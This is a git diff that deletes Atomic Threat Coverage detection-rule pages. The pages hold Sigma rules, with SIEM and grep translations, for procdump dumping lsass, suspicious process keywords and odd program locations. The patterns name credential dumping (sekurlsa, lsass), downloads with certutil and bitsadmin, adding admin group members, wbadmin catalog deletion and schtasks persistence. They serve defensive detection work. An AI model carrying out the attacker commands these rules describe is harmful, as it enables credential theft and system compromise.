-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5afee48e-67dd-4e03-a783-f74259dcf998 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Use of Procdump",
-    "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036",
-      "attack.credential_access",
-      "attack.t1003",
-      "car.2013-05-009",
-      "attack.t1003.001"
-    ],
-    "query": "((winlog.event_data.CommandLine.keyword:(*\\ \\-ma\\ *) AND winlog.event_data.CommandLine.keyword:(*\\ lsass*)) OR winlog.event_data.CommandLine.keyword:(*\\ \\-ma\\ ls*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.CommandLine.keyword:(*\\ \\-ma\\ *) AND winlog.event_data.CommandLine.keyword:(*\\ lsass*)) OR winlog.event_data.CommandLine.keyword:(*\\ \\-ma\\ ls*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Use of Procdump'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((CommandLine.keyword:(* \-ma *) AND CommandLine.keyword:(* lsass*)) OR CommandLine.keyword:(* \-ma ls*))
-```
-
-
-### splunk
-    
-```
-(((CommandLine="* -ma *") (CommandLine="* lsass*")) OR (CommandLine="* -ma ls*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((event_id="1" CommandLine IN ["* -ma *"] CommandLine IN ["* lsass*"]) OR CommandLine IN ["* -ma ls*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.* -ma .*))(?=.*(?:.*.* lsass.*)))|.*(?:.*.* -ma ls.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_process_creations.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_process_creations.md
deleted file mode 100644
index e40c7f4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_process_creations.md
+++ /dev/null
@@ -1,224 +0,0 @@
-| Title                    | Suspicious Process Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious process starts on Windows systems based on keywords |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/](https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/)</li><li>[https://www.youtube.com/watch?v=H3t_kHQG1Js&feature=youtu.be&t=15m35s](https://www.youtube.com/watch?v=H3t_kHQG1Js&feature=youtu.be&t=15m35s)</li><li>[https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/](https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/)</li><li>[https://twitter.com/subTee/status/872244674609676288](https://twitter.com/subTee/status/872244674609676288)</li><li>[https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/remote-tool-examples](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/remote-tool-examples)</li><li>[https://tyranidslair.blogspot.ca/2017/07/dg-on-windows-10-s-executing-arbitrary.html](https://tyranidslair.blogspot.ca/2017/07/dg-on-windows-10-s-executing-arbitrary.html)</li><li>[https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/](https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/)</li><li>[https://subt0x10.blogspot.ca/2017/04/bypassing-application-whitelisting.html](https://subt0x10.blogspot.ca/2017/04/bypassing-application-whitelisting.html)</li><li>[https://gist.github.com/subTee/7937a8ef07409715f15b84781e180c46#file-rat-bat](https://gist.github.com/subTee/7937a8ef07409715f15b84781e180c46#file-rat-bat)</li><li>[https://twitter.com/vector_sec/status/896049052642533376](https://twitter.com/vector_sec/status/896049052642533376)</li><li>[http://security-research.dyndns.org/pub/slides/FIRST-TC-2018/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf](http://security-research.dyndns.org/pub/slides/FIRST-TC-2018/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf)</li></ul>  |
-| **Author**               | Florian Roth, Daniil Yugoslavskiy, oscd.community (update) |
-| Other Tags           | <ul><li>car.2013-07-001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Process Creation
-id: 5f0f47a5-cb16-4dbe-9e31-e8d976d73de3
-description: Detects suspicious process starts on Windows systems based on keywords
-status: experimental
-references:
-    - https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/
-    - https://www.youtube.com/watch?v=H3t_kHQG1Js&feature=youtu.be&t=15m35s
-    - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
-    - https://twitter.com/subTee/status/872244674609676288
-    - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/remote-tool-examples
-    - https://tyranidslair.blogspot.ca/2017/07/dg-on-windows-10-s-executing-arbitrary.html
-    - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
-    - https://subt0x10.blogspot.ca/2017/04/bypassing-application-whitelisting.html
-    - https://gist.github.com/subTee/7937a8ef07409715f15b84781e180c46#file-rat-bat
-    - https://twitter.com/vector_sec/status/896049052642533376
-    - http://security-research.dyndns.org/pub/slides/FIRST-TC-2018/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf
-author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
-date: 2018/01/01
-modified: 2019/11/01
-tags:
-    - car.2013-07-001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* sekurlsa:*'
-            - net localgroup administrators * /add
-            - net group "Domain Admins" * /ADD /DOMAIN
-            - certutil.exe *-urlcache* http*
-            - certutil.exe *-urlcache* ftp*
-            - netsh advfirewall firewall *\AppData\\*
-            - attrib +S +H +R *\AppData\\*
-            - schtasks* /create *\AppData\\*
-            - schtasks* /sc minute*
-            - '*\Regasm.exe *\AppData\\*'
-            - '*\Regasm *\AppData\\*'
-            - '*\bitsadmin* /transfer*'
-            - '*\certutil.exe * -decode *'
-            - '*\certutil.exe * -decodehex *'
-            - '*\certutil.exe -ping *'
-            - icacls * /grant Everyone:F /T /C /Q
-            - '* wbadmin.exe delete catalog -quiet*'
-            - '*\wscript.exe *.jse'
-            - '*\wscript.exe *.js'
-            - '*\wscript.exe *.vba'
-            - '*\wscript.exe *.vbe'
-            - '*\cscript.exe *.jse'
-            - '*\cscript.exe *.js'
-            - '*\cscript.exe *.vba'
-            - '*\cscript.exe *.vbe'
-            - '*\fodhelper.exe'
-            - '*waitfor*/s*'
-            - '*waitfor*/si persist*'
-            - '*remote*/s*'
-            - '*remote*/c*'
-            - '*remote*/q*'
-            - '*AddInProcess*'
-            - '* /stext *'
-            - '* /scomma *'
-            - '* /stab *'
-            - '* /stabular *'
-            - '* /shtml *'
-            - '* /sverhtml *'
-            - '* /sxml *'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* sekurlsa:.*" -or $_.message -match "CommandLine.*net localgroup administrators .* /add" -or $_.message -match "CommandLine.*net group \"Domain Admins\" .* /ADD /DOMAIN" -or $_.message -match "CommandLine.*certutil.exe .*-urlcache.* http.*" -or $_.message -match "CommandLine.*certutil.exe .*-urlcache.* ftp.*" -or $_.message -match "CommandLine.*netsh advfirewall firewall .*\\AppData\\.*" -or $_.message -match "CommandLine.*attrib \+S \+H \+R .*\\AppData\\.*" -or $_.message -match "CommandLine.*schtasks.* /create .*\\AppData\\.*" -or $_.message -match "CommandLine.*schtasks.* /sc minute.*" -or $_.message -match "CommandLine.*.*\\Regasm.exe .*\\AppData\\.*" -or $_.message -match "CommandLine.*.*\\Regasm .*\\AppData\\.*" -or $_.message -match "CommandLine.*.*\\bitsadmin.* /transfer.*" -or $_.message -match "CommandLine.*.*\\certutil.exe .* -decode .*" -or $_.message -match "CommandLine.*.*\\certutil.exe .* -decodehex .*" -or $_.message -match "CommandLine.*.*\\certutil.exe -ping .*" -or $_.message -match "CommandLine.*icacls .* /grant Everyone:F /T /C /Q" -or $_.message -match "CommandLine.*.* wbadmin.exe delete catalog -quiet.*" -or $_.message -match "CommandLine.*.*\\wscript.exe .*.jse" -or $_.message -match "CommandLine.*.*\\wscript.exe .*.js" -or $_.message -match "CommandLine.*.*\\wscript.exe .*.vba" -or $_.message -match "CommandLine.*.*\\wscript.exe .*.vbe" -or $_.message -match "CommandLine.*.*\\cscript.exe .*.jse" -or $_.message -match "CommandLine.*.*\\cscript.exe .*.js" -or $_.message -match "CommandLine.*.*\\cscript.exe .*.vba" -or $_.message -match "CommandLine.*.*\\cscript.exe .*.vbe" -or $_.message -match "CommandLine.*.*\\fodhelper.exe" -or $_.message -match "CommandLine.*.*waitfor.*/s.*" -or $_.message -match "CommandLine.*.*waitfor.*/si persist.*" -or $_.message -match "CommandLine.*.*remote.*/s.*" -or $_.message -match "CommandLine.*.*remote.*/c.*" -or $_.message -match "CommandLine.*.*remote.*/q.*" -or $_.message -match "CommandLine.*.*AddInProcess.*" -or $_.message -match "CommandLine.*.* /stext .*" -or $_.message -match "CommandLine.*.* /scomma .*" -or $_.message -match "CommandLine.*.* /stab .*" -or $_.message -match "CommandLine.*.* /stabular .*" -or $_.message -match "CommandLine.*.* /shtml .*" -or $_.message -match "CommandLine.*.* /sverhtml .*" -or $_.message -match "CommandLine.*.* /sxml .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ sekurlsa\:* OR net\ localgroup\ administrators\ *\ \/add OR net\ group\ \"Domain\ Admins\"\ *\ \/ADD\ \/DOMAIN OR certutil.exe\ *\-urlcache*\ http* OR certutil.exe\ *\-urlcache*\ ftp* OR netsh\ advfirewall\ firewall\ *\\AppData\\* OR attrib\ \+S\ \+H\ \+R\ *\\AppData\\* OR schtasks*\ \/create\ *\\AppData\\* OR schtasks*\ \/sc\ minute* OR *\\Regasm.exe\ *\\AppData\\* OR *\\Regasm\ *\\AppData\\* OR *\\bitsadmin*\ \/transfer* OR *\\certutil.exe\ *\ \-decode\ * OR *\\certutil.exe\ *\ \-decodehex\ * OR *\\certutil.exe\ \-ping\ * OR icacls\ *\ \/grant\ Everyone\:F\ \/T\ \/C\ \/Q OR *\ wbadmin.exe\ delete\ catalog\ \-quiet* OR *\\wscript.exe\ *.jse OR *\\wscript.exe\ *.js OR *\\wscript.exe\ *.vba OR *\\wscript.exe\ *.vbe OR *\\cscript.exe\ *.jse OR *\\cscript.exe\ *.js OR *\\cscript.exe\ *.vba OR *\\cscript.exe\ *.vbe OR *\\fodhelper.exe OR *waitfor*\/s* OR *waitfor*\/si\ persist* OR *remote*\/s* OR *remote*\/c* OR *remote*\/q* OR *AddInProcess* OR *\ \/stext\ * OR *\ \/scomma\ * OR *\ \/stab\ * OR *\ \/stabular\ * OR *\ \/shtml\ * OR *\ \/sverhtml\ * OR *\ \/sxml\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5f0f47a5-cb16-4dbe-9e31-e8d976d73de3 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Process Creation",
-    "description": "Detects suspicious process starts on Windows systems based on keywords",
-    "tags": [
-      "car.2013-07-001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ sekurlsa\\:* OR net\\ localgroup\\ administrators\\ *\\ \\/add OR net\\ group\\ \\\"Domain\\ Admins\\\"\\ *\\ \\/ADD\\ \\/DOMAIN OR certutil.exe\\ *\\-urlcache*\\ http* OR certutil.exe\\ *\\-urlcache*\\ ftp* OR netsh\\ advfirewall\\ firewall\\ *\\\\AppData\\\\* OR attrib\\ \\+S\\ \\+H\\ \\+R\\ *\\\\AppData\\\\* OR schtasks*\\ \\/create\\ *\\\\AppData\\\\* OR schtasks*\\ \\/sc\\ minute* OR *\\\\Regasm.exe\\ *\\\\AppData\\\\* OR *\\\\Regasm\\ *\\\\AppData\\\\* OR *\\\\bitsadmin*\\ \\/transfer* OR *\\\\certutil.exe\\ *\\ \\-decode\\ * OR *\\\\certutil.exe\\ *\\ \\-decodehex\\ * OR *\\\\certutil.exe\\ \\-ping\\ * OR icacls\\ *\\ \\/grant\\ Everyone\\:F\\ \\/T\\ \\/C\\ \\/Q OR *\\ wbadmin.exe\\ delete\\ catalog\\ \\-quiet* OR *\\\\wscript.exe\\ *.jse OR *\\\\wscript.exe\\ *.js OR *\\\\wscript.exe\\ *.vba OR *\\\\wscript.exe\\ *.vbe OR *\\\\cscript.exe\\ *.jse OR *\\\\cscript.exe\\ *.js OR *\\\\cscript.exe\\ *.vba OR *\\\\cscript.exe\\ *.vbe OR *\\\\fodhelper.exe OR *waitfor*\\/s* OR *waitfor*\\/si\\ persist* OR *remote*\\/s* OR *remote*\\/c* OR *remote*\\/q* OR *AddInProcess* OR *\\ \\/stext\\ * OR *\\ \\/scomma\\ * OR *\\ \\/stab\\ * OR *\\ \\/stabular\\ * OR *\\ \\/shtml\\ * OR *\\ \\/sverhtml\\ * OR *\\ \\/sxml\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ sekurlsa\\:* OR net\\ localgroup\\ administrators\\ *\\ \\/add OR net\\ group\\ \\\"Domain\\ Admins\\\"\\ *\\ \\/ADD\\ \\/DOMAIN OR certutil.exe\\ *\\-urlcache*\\ http* OR certutil.exe\\ *\\-urlcache*\\ ftp* OR netsh\\ advfirewall\\ firewall\\ *\\\\AppData\\\\* OR attrib\\ \\+S\\ \\+H\\ \\+R\\ *\\\\AppData\\\\* OR schtasks*\\ \\/create\\ *\\\\AppData\\\\* OR schtasks*\\ \\/sc\\ minute* OR *\\\\Regasm.exe\\ *\\\\AppData\\\\* OR *\\\\Regasm\\ *\\\\AppData\\\\* OR *\\\\bitsadmin*\\ \\/transfer* OR *\\\\certutil.exe\\ *\\ \\-decode\\ * OR *\\\\certutil.exe\\ *\\ \\-decodehex\\ * OR *\\\\certutil.exe\\ \\-ping\\ * OR icacls\\ *\\ \\/grant\\ Everyone\\:F\\ \\/T\\ \\/C\\ \\/Q OR *\\ wbadmin.exe\\ delete\\ catalog\\ \\-quiet* OR *\\\\wscript.exe\\ *.jse OR *\\\\wscript.exe\\ *.js OR *\\\\wscript.exe\\ *.vba OR *\\\\wscript.exe\\ *.vbe OR *\\\\cscript.exe\\ *.jse OR *\\\\cscript.exe\\ *.js OR *\\\\cscript.exe\\ *.vba OR *\\\\cscript.exe\\ *.vbe OR *\\\\fodhelper.exe OR *waitfor*\\/s* OR *waitfor*\\/si\\ persist* OR *remote*\\/s* OR *remote*\\/c* OR *remote*\\/q* OR *AddInProcess* OR *\\ \\/stext\\ * OR *\\ \\/scomma\\ * OR *\\ \\/stab\\ * OR *\\ \\/stabular\\ * OR *\\ \\/shtml\\ * OR *\\ \\/sverhtml\\ * OR *\\ \\/sxml\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Process Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* sekurlsa\:* net localgroup administrators * \/add net group \"Domain Admins\" * \/ADD \/DOMAIN certutil.exe *\-urlcache* http* certutil.exe *\-urlcache* ftp* netsh advfirewall firewall *\\AppData\\* attrib \+S \+H \+R *\\AppData\\* schtasks* \/create *\\AppData\\* schtasks* \/sc minute* *\\Regasm.exe *\\AppData\\* *\\Regasm *\\AppData\\* *\\bitsadmin* \/transfer* *\\certutil.exe * \-decode * *\\certutil.exe * \-decodehex * *\\certutil.exe \-ping * icacls * \/grant Everyone\:F \/T \/C \/Q * wbadmin.exe delete catalog \-quiet* *\\wscript.exe *.jse *\\wscript.exe *.js *\\wscript.exe *.vba *\\wscript.exe *.vbe *\\cscript.exe *.jse *\\cscript.exe *.js *\\cscript.exe *.vba *\\cscript.exe *.vbe *\\fodhelper.exe *waitfor*\/s* *waitfor*\/si persist* *remote*\/s* *remote*\/c* *remote*\/q* *AddInProcess* * \/stext * * \/scomma * * \/stab * * \/stabular * * \/shtml * * \/sverhtml * * \/sxml *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* sekurlsa:*" OR CommandLine="net localgroup administrators * /add" OR CommandLine="net group \"Domain Admins\" * /ADD /DOMAIN" OR CommandLine="certutil.exe *-urlcache* http*" OR CommandLine="certutil.exe *-urlcache* ftp*" OR CommandLine="netsh advfirewall firewall *\\AppData\\*" OR CommandLine="attrib +S +H +R *\\AppData\\*" OR CommandLine="schtasks* /create *\\AppData\\*" OR CommandLine="schtasks* /sc minute*" OR CommandLine="*\\Regasm.exe *\\AppData\\*" OR CommandLine="*\\Regasm *\\AppData\\*" OR CommandLine="*\\bitsadmin* /transfer*" OR CommandLine="*\\certutil.exe * -decode *" OR CommandLine="*\\certutil.exe * -decodehex *" OR CommandLine="*\\certutil.exe -ping *" OR CommandLine="icacls * /grant Everyone:F /T /C /Q" OR CommandLine="* wbadmin.exe delete catalog -quiet*" OR CommandLine="*\\wscript.exe *.jse" OR CommandLine="*\\wscript.exe *.js" OR CommandLine="*\\wscript.exe *.vba" OR CommandLine="*\\wscript.exe *.vbe" OR CommandLine="*\\cscript.exe *.jse" OR CommandLine="*\\cscript.exe *.js" OR CommandLine="*\\cscript.exe *.vba" OR CommandLine="*\\cscript.exe *.vbe" OR CommandLine="*\\fodhelper.exe" OR CommandLine="*waitfor*/s*" OR CommandLine="*waitfor*/si persist*" OR CommandLine="*remote*/s*" OR CommandLine="*remote*/c*" OR CommandLine="*remote*/q*" OR CommandLine="*AddInProcess*" OR CommandLine="* /stext *" OR CommandLine="* /scomma *" OR CommandLine="* /stab *" OR CommandLine="* /stabular *" OR CommandLine="* /shtml *" OR CommandLine="* /sverhtml *" OR CommandLine="* /sxml *") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* sekurlsa:*", "net localgroup administrators * /add", "net group \"Domain Admins\" * /ADD /DOMAIN", "certutil.exe *-urlcache* http*", "certutil.exe *-urlcache* ftp*", "netsh advfirewall firewall *\\AppData\\*", "attrib +S +H +R *\\AppData\\*", "schtasks* /create *\\AppData\\*", "schtasks* /sc minute*", "*\\Regasm.exe *\\AppData\\*", "*\\Regasm *\\AppData\\*", "*\\bitsadmin* /transfer*", "*\\certutil.exe * -decode *", "*\\certutil.exe * -decodehex *", "*\\certutil.exe -ping *", "icacls * /grant Everyone:F /T /C /Q", "* wbadmin.exe delete catalog -quiet*", "*\\wscript.exe *.jse", "*\\wscript.exe *.js", "*\\wscript.exe *.vba", "*\\wscript.exe *.vbe", "*\\cscript.exe *.jse", "*\\cscript.exe *.js", "*\\cscript.exe *.vba", "*\\cscript.exe *.vbe", "*\\fodhelper.exe", "*waitfor*/s*", "*waitfor*/si persist*", "*remote*/s*", "*remote*/c*", "*remote*/q*", "*AddInProcess*", "* /stext *", "* /scomma *", "* /stab *", "* /stabular *", "* /shtml *", "* /sverhtml *", "* /sxml *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* sekurlsa:.*|.*net localgroup administrators .* /add|.*net group "Domain Admins" .* /ADD /DOMAIN|.*certutil\.exe .*-urlcache.* http.*|.*certutil\.exe .*-urlcache.* ftp.*|.*netsh advfirewall firewall .*\AppData\\.*|.*attrib \+S \+H \+R .*\AppData\\.*|.*schtasks.* /create .*\AppData\\.*|.*schtasks.* /sc minute.*|.*.*\Regasm\.exe .*\AppData\\.*|.*.*\Regasm .*\AppData\\.*|.*.*\bitsadmin.* /transfer.*|.*.*\certutil\.exe .* -decode .*|.*.*\certutil\.exe .* -decodehex .*|.*.*\certutil\.exe -ping .*|.*icacls .* /grant Everyone:F /T /C /Q|.*.* wbadmin\.exe delete catalog -quiet.*|.*.*\wscript\.exe .*\.jse|.*.*\wscript\.exe .*\.js|.*.*\wscript\.exe .*\.vba|.*.*\wscript\.exe .*\.vbe|.*.*\cscript\.exe .*\.jse|.*.*\cscript\.exe .*\.js|.*.*\cscript\.exe .*\.vba|.*.*\cscript\.exe .*\.vbe|.*.*\fodhelper\.exe|.*.*waitfor.*/s.*|.*.*waitfor.*/si persist.*|.*.*remote.*/s.*|.*.*remote.*/c.*|.*.*remote.*/q.*|.*.*AddInProcess.*|.*.* /stext .*|.*.* /scomma .*|.*.* /stab .*|.*.* /stabular .*|.*.* /shtml .*|.*.* /sverhtml .*|.*.* /sxml .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_prog_location_process_starts.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_prog_location_process_starts.md
deleted file mode 100644
index 1158be2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_prog_location_process_starts.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspicious Program Location Process Starts       |
-|:-------------------------|:------------------|
-| **Description**          | Detects programs running in suspicious files system locations |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo](https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Program Location Process Starts
-id: f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5
-status: experimental
-description: Detects programs running in suspicious files system locations
-references:
-    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-author: Florian Roth
-date: 2019/01/15
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\$Recycle.bin'
-            - '*\Users\Public\\*'
-            - 'C:\Perflogs\\*'
-            - '*\Windows\Fonts\\*'
-            - '*\Windows\IME\\*'
-            - '*\Windows\addins\\*'
-            - '*\Windows\debug\\*'
-    condition: selection
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\$Recycle.bin" -or $_.message -match "Image.*.*\\Users\\Public\\.*" -or $_.message -match "Image.*C:\\Perflogs\\.*" -or $_.message -match "Image.*.*\\Windows\\Fonts\\.*" -or $_.message -match "Image.*.*\\Windows\\IME\\.*" -or $_.message -match "Image.*.*\\Windows\\addins\\.*" -or $_.message -match "Image.*.*\\Windows\\debug\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(*\\$Recycle.bin OR *\\Users\\Public\\* OR C\:\\Perflogs\\* OR *\\Windows\\Fonts\\* OR *\\Windows\\IME\\* OR *\\Windows\\addins\\* OR *\\Windows\\debug\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Program Location Process Starts",
-    "description": "Detects programs running in suspicious files system locations",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "winlog.event_data.Image.keyword:(*\\\\$Recycle.bin OR *\\\\Users\\\\Public\\\\* OR C\\:\\\\Perflogs\\\\* OR *\\\\Windows\\\\Fonts\\\\* OR *\\\\Windows\\\\IME\\\\* OR *\\\\Windows\\\\addins\\\\* OR *\\\\Windows\\\\debug\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(*\\\\$Recycle.bin OR *\\\\Users\\\\Public\\\\* OR C\\:\\\\Perflogs\\\\* OR *\\\\Windows\\\\Fonts\\\\* OR *\\\\Windows\\\\IME\\\\* OR *\\\\Windows\\\\addins\\\\* OR *\\\\Windows\\\\debug\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Program Location Process Starts'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(*\\$Recycle.bin *\\Users\\Public\\* C\:\\Perflogs\\* *\\Windows\\Fonts\\* *\\Windows\\IME\\* *\\Windows\\addins\\* *\\Windows\\debug\\*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\$Recycle.bin" OR Image="*\\Users\\Public\\*" OR Image="C:\\Perflogs\\*" OR Image="*\\Windows\\Fonts\\*" OR Image="*\\Windows\\IME\\*" OR Image="*\\Windows\\addins\\*" OR Image="*\\Windows\\debug\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\$Recycle.bin", "*\\Users\\Public\\*", "C:\\Perflogs\\*", "*\\Windows\\Fonts\\*", "*\\Windows\\IME\\*", "*\\Windows\\addins\\*", "*\\Windows\\debug\\*"])
-```
-
-
-### grep
-    
-```
